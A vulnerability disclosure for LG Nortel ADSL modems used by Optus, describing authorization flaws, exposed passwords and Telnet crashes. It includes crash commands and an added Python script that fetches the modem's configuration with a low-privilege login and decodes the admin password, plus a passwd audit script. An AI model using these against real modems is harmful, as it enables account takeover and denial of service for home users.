# Title: [LG Nortel ADSL modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [NA]
# Version Reported: [Board ID: DV2020 + Product Version: S1.064B2.3H0-0 + Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e]

*Timelines*
April 2015: Vulnerabilities found
April 2015: Reported to Optus & CERT
April - October 2015: CERT (US/AUS) attempts to identify vendor / device ownership. None found.
Dec 03, 2015: Public disclosure

*CVE-IDs*
None (Mitre..?)

*Note*: After several months, vendor ownership for this device still remains unknown/unconfirmed. Regardless, it is currently in use, deployed by Optus (Australia) to possibly 20-30% of its customer base (primarily broadband services - home users / SOHO). So, quite a number up there. There may be others, but I & CERT are not aware of such.

*Device Info*
Board ID: DV2020
Product Version: S1.064B2.3H0-0
Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e
Bootloader (CFE) Version: 1.0.37-4.3
Wireless Driver Version: 3.131.35.0.cpe0.0

*Vulnerabilities*
Authorization flaws, Sensitive Information Disclosure, Insecure configuration, Denial of Service

*1. Authorization Flaws (HTTP)*

1.1 *Non-admin users can access restricted, administrative functionality (accessible to admin only)*

The LG-Nortel ADSL modem has three (3) users with different privilege levels for administering the device. The administrative ‘admin’ user has complete privileges to access and perform all functions on the modem. The other, non-admin users - ‘support’ and ‘user’ - have restricted functional access and can perform only limited functions.

A non-admin ‘user’ does not have access to administrative functions via the GUI menu, i.e. no administrative function links are *seen/visible* on the home page. However, the application lacks sufficient authorization controls, and a ‘user’ can still reach the administrative functionality via direct URL access.
For example, a non-admin ‘user’ has no menu option to access the device configuration file. However, it can still retrieve the file - *backupsettings.conf* - by requesting the URL directly:

http://<modem-ip>/backupsettings.conf

With access to this configuration file, a low-privileged ‘user’ can easily obtain the login passwords for ‘admin’ and any other valid users of the modem. The login passwords are stored base64-encoded, which is an encoding rather than a protection: the clear-text password(s) are recovered with a single decode. In a similar manner, the low-privileged ‘user’ and ‘support’ logins can also reach other administrative functions.

1.2 *Application does not secure sensitive configuration details from non-admin ‘user’ (HTTP)*

The application allows read-only access to the ‘user’ login. However, sensitive configuration information such as passwords, keys etc. is not restricted from this user. All configuration details are readily accessible and readable to the ‘user’ login.

1.3 *Password Change - Clear-text Password Disclosure*

The application does not secure a newly changed password. Once the password is changed, the application reveals the new password in the address bar, as:

http://<modem-ip>/password.cgi?sptPassword=<new-password>

This HTTP GET request carries the new, valid password in clear-text in the query string, so it is also exposed in browser history and in any proxy or web-server log.

*2. Application does not secure configured passwords (HTTP)*

The application relies on client-side checks only - which can be easily bypassed - to hide juicy info like service accounts and their respective passwords. These passwords are masked in the GUI and only ***** is shown in the corresponding fields, but the real values travel in the clear in the page’s own HTTP requests. The following HTTP GET request shows a capture of the *masked* SIP / VoIP password(s):

GET /voicesipset.cmd?proxyAddr=sip11.yesphone.optus.com.au&proxyPort=5060&regAddr=sip11.yesphone.optus.com.au&regPort=5060&extension1=&extension2=&password1=<password-removed>&password2=&ifName=ppp_8_32_1&servermode=proxy&telurl=sip&regexpiry=1800&hostname=sip11.xxx.xxx.com.au&localport=5060&display1=&display2=&authuser1=&authuser2= HTTP/1.1

*3. Insecure configuration (Telnet)*

3.1 *No separation of privileges*

After logging in over Telnet as ‘user’, the system still permits running system-level commands and reading sensitive files from the file-system. *shadow* is not used: all hashes are stored in *passwd*, which is readable by everyone, and all system users are uid 0, gid 0, i.e. root-privileged superusers. :)

3.2 *Application does not secure sensitive configuration details from ‘user’*

The application permits the ‘user’ login to view sensitive information in the modem’s configuration. To view the configuration, the Telnet administrative console provides a command - *dumpcfg* - to ‘user’. Running this command as the ‘user’ login dumps the device configuration. This includes sensitive information such as passwords and keys - all in clear-text.

*4. Authorization flaws + Denial of Service (Telnet)*

After logging in to the modem, the *passwd* command can be used to change the passwords of all three users - ‘admin’, ‘support’, and ‘user’.

> passwd
Usage: passwd
       passwd --help

A non-admin ‘user’ account should be restricted from changing the passwords of any other accounts. What actually happens:

*1st attempt - Failed*

> passwd admin admin1
Connection closed by foreign host.

The first attempt to change the ‘admin’ login password fails and the telnet connection drops. The Telnet service has now crashed, and the device needs a reboot. First attempt -> application crash. I.e. the Telnet daemon / service can be easily crashed by logging in as a low-privileged user and attempting an unauthorized action, such as trying to change the password of the ‘admin’ user.

On the second attempt, the command executes and the password for ‘admin’ is changed successfully.

*2nd attempt - Successful*

> passwd admin admin1
>

Following this password change, the Telnet service again becomes non-responsive within 10-15 seconds and the connection drops. Second attempt -> application changes the pass :)

There is another way to crash the Telnet service.
Log in to Telnet as ‘user’, drop to the underlying BusyBox shell and issue the *vconfig* command:

# telnet 10.1.1.1
> sh
> vconfig
-> DoS / crash

+++++

--
Best Regards,
Karn Ganeshen
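Added example for section 1.1 (not code from the original advisory): a small Python script that requests admin-only URLs with the low-privilege login and base64-decodes the password fields of whatever backupsettings.conf comes back. Assumptions, all mine: that the modem accepts HTTP Basic authentication (the advisory does not say which scheme the web UI uses), the XML-like layout of the sample config and its password tag names, and the constructed sample values; the 10.1.1.1 address is the one used in the advisory's telnet example.

```python
"""Probe admin-only URLs as a low-privilege login and decode base64 passwords.

Added example for section 1.1 of the advisory; not code from the original
report. HTTP Basic auth and the sample config layout are assumptions.
"""
import base64
import re
import sys
import urllib.request
from urllib.error import HTTPError, URLError

# Constructed sample of a backupsettings.conf. The real file's layout is not
# shown in the advisory; only the base64 encoding of the passwords is.
SAMPLE_CONF = """<UserAccounts>
<AdminUserName>admin</AdminUserName>
<AdminPassword>U2VjcmV0UGFzczEyMw==</AdminPassword>
<SupportUserName>support</SupportUserName>
<SupportPassword>c3VwcDBydCE=</SupportPassword>
<UserUserName>user</UserUserName>
<UserPassword>dXNlcjEyMw==</UserPassword>
</UserAccounts>
"""

# Admin-only paths the GUI hides from 'user'. backupsettings.conf is named in
# the advisory; extend the list with other hidden URLs as you find them.
ADMIN_ONLY_PATHS = ["/backupsettings.conf"]

# Matches <SomethingPassword>base64</SomethingPassword> (assumed tag names).
PASSWORD_TAG = re.compile(r"<(\w*Password)>([A-Za-z0-9+/=]*)</\1>")


def decode_passwords(conf_text):
    """Return {tag: cleartext} for each base64 password field in conf_text.

    Fields that are not valid base64 / printable ASCII map to None rather
    than to a guessed value.
    """
    found = {}
    for tag, b64 in PASSWORD_TAG.findall(conf_text):
        try:
            clear = base64.b64decode(b64, validate=True).decode("ascii")
            found[tag] = clear if clear.isprintable() else None
        except (ValueError, UnicodeDecodeError):
            found[tag] = None
    return found


def make_basic_auth_fetch(username, password, timeout=10):
    """Build fetch(url) -> (status, body) that sends HTTP Basic credentials.

    Basic auth is an assumption about the modem; swap this function out if
    the device uses a cookie session instead.
    """
    token = base64.b64encode(f"{username}:{password}".encode()).decode()

    def fetch(url):
        req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except HTTPError as err:       # 401/403 are answers, not failures
            return err.code, ""
        except URLError as err:
            raise SystemExit(f"cannot reach {url}: {err.reason}")

    return fetch


def probe_direct_access(base_url, paths, fetch):
    """Request each path with the given fetch; return {path: (status, body)}.

    Any 200 for the low-privilege login is the missing authorization check.
    """
    base = base_url.rstrip("/")
    return {path: fetch(base + path) for path in paths}


def main(argv):
    if len(argv) != 4:
        print(f"usage: {argv[0]} http://<modem-ip> <username> <password>")
        return 1
    base_url, username, password = argv[1:]
    fetch = make_basic_auth_fetch(username, password)
    for path, (status, body) in probe_direct_access(base_url, ADMIN_ONLY_PATHS, fetch).items():
        print(f"{status} {path}")
        if status == 200 and path.endswith(".conf"):
            for tag, clear in decode_passwords(body).items():
                print(f"   {tag}: {clear!r}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 probe.py http://10.1.1.1 user <user-password>`; a 200 for backupsettings.conf followed by decoded AdminPassword is the section 1.1 finding reproduced end to end. The fetch function is injectable so the decoding logic can be exercised offline against the constructed sample.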
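Added example for section 3.1 (not code from the original advisory): a Python audit of a passwd file copied off the modem over the Telnet shell, flagging password hashes kept in the world-readable file and accounts that run as uid 0 / gid 0. The sample passwd content is constructed with dummy hashes, since the advisory describes the file but does not print it; treating ‘x’, ‘*’ and ‘!’ in the password field as "shadowed or locked" is the usual Linux/BusyBox convention, not something the advisory states.

```python
"""Audit a BusyBox-style /etc/passwd for the weaknesses in section 3.1.

Added example; not from the original advisory. The sample below is
constructed (dummy hashes), since the report describes the file but does
not print it.
"""
import sys

# Constructed sample: every login account uid 0 / gid 0 and MD5-crypt style
# hashes sitting in passwd itself, as the advisory describes.
SAMPLE_PASSWD = """\
admin:$1$dummyadminhash:0:0:Administrator:/:/bin/sh
support:$1$dummysupporthash:0:0:Technical Support:/:/bin/sh
user:$1$dummyuserhash:0:0:Normal User:/:/bin/sh
nobody:*:99:99:nobody:/:/bin/false
"""

# Password-field values that mean "no hash here": shadowed or locked.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd lines into dicts; raise on malformed lines."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return a list of (account, issue) findings for the file contents."""
    findings = []
    for e in parse_passwd(text):
        name, pw = e["name"], e["pw"]
        if pw == "":
            findings.append((name, "empty password field: login without a password"))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append((name, "password hash stored in world-readable passwd (no shadow)"))
        if e["uid"] == 0 and name != "root":
            findings.append((name, "uid 0: full root privileges"))
        if e["gid"] == 0 and name != "root":
            findings.append((name, "gid 0: root group membership"))
    return findings


def superusers(text):
    """Names of all uid-0 accounts; more than one means the privilege levels are cosmetic."""
    return [e["name"] for e in parse_passwd(text) if e["uid"] == 0]


def main(argv):
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_PASSWD
    for name, issue in audit_passwd(text):
        print(f"{name}: {issue}")
    print("uid 0 accounts:", ", ".join(superusers(text)))


if __name__ == "__main__":
    main(sys.argv)
```

Run `python3 audit_passwd.py passwd.txt` on the file pulled from the modem; on a healthy system the only uid-0 account is root and every password field is ‘x’ with the hashes in a root-only shadow file, so the script prints nothing but "uid 0 accounts: root".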